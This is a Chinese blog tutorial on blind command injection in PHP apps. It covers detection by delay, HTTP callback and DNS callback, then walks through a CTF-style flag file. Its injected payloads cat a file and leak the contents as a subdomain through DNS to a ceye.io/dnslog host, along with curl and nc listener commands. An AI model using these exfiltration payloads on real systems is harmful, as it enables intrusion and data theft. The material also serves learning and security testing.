命令执行小记2

命令执行小记2,第1张

命令执行小记2 命令执行分类

根据是否结果输出,分为回显和无回显命令执行两种类型

漏洞挖掘第一步:判断是否存在命令执行

方法:
1.根据页面响应延时
2.发送HTTP请求,HTTP服务端显示请求
3.发送DNS,DNS请求服务端显示请求
延时执行

在shell命令中,具有sleep命令可以完成延时执行。

ls -alh | sleep 3

PHP无回显代码漏洞


现象:

HTTP请求

curl发出http请求,那么在服务端可以查看验证是否发送http请求。

服务端设置监听80端口,等待连接,输出响应

nc -lvp 80
或 在python2中
python -m SimpleHTTPServer -p 80

curl 服务端IP地址:端口号

PHP无回显漏洞代码:


// 访问2.php?cmd=curl ip:26 ,如果服务端发现请求,那么存在命令执行漏洞

DNS请求

发出DNS请求,在请求中具有读取的数据。例如ping域名,那么会进行DNS请求。

推荐免费使用ceye.io或者dnslog.cn


// 访问1.php?cmd=ping -c 3 aaa.xxx.c05smm.dnslog.cn

dnslog
  

思路:读取where_is_flag.php的内容

cat 可以读取文件内容,但是不能回显,此时可以理由dnslog在DNS请求中查询文件内容拼接域名的信息。

本地读取思路 cp

ping.php?a=;cp where_is_flag.php where_is_flag.txt

DNS请求读取思路

sed s/空格/没有任何内容/ 替换文本的空格为空,其中[[:space:]]代表代码中的空格。

ping.php?a=`cat where_is_flag.php | sed s/[[:space:]]//g`.f8q9lc.ceye.io

由于目前不支持ping特殊符号,所以替换内容

a=`cat where_is_flag.php|sed s/[[:space:]]//g|tr "<|?|$|{|}|'|;|=>" "0"`.f8q9lc.ceye.io

a=`cat where_is_flag.php|sed s/[[:space:]]//g|tr "<|?|$|{|}|'|;|=>" "1"`.f8q9lc.ceye.io

此时执行后,ceye.io后台的DNS请求中具有请求数据,查看即可的where_is_flag.php中的内容

00php0flag00flag0aaabbbccc00000.f8q9lc.ceye.io

11php1flag11flag1aaabbbccc11111.f8q9lc.ceye.io

小结:

1.命令执行分类:回显和无回显。

2.判断无回显的命令执行漏洞的三种方法:延时,HTTP请求,DNS请求

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5619010.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-15
下一篇 2022-12-15

发表评论

登录后才能评论

评论列表(0条)

保存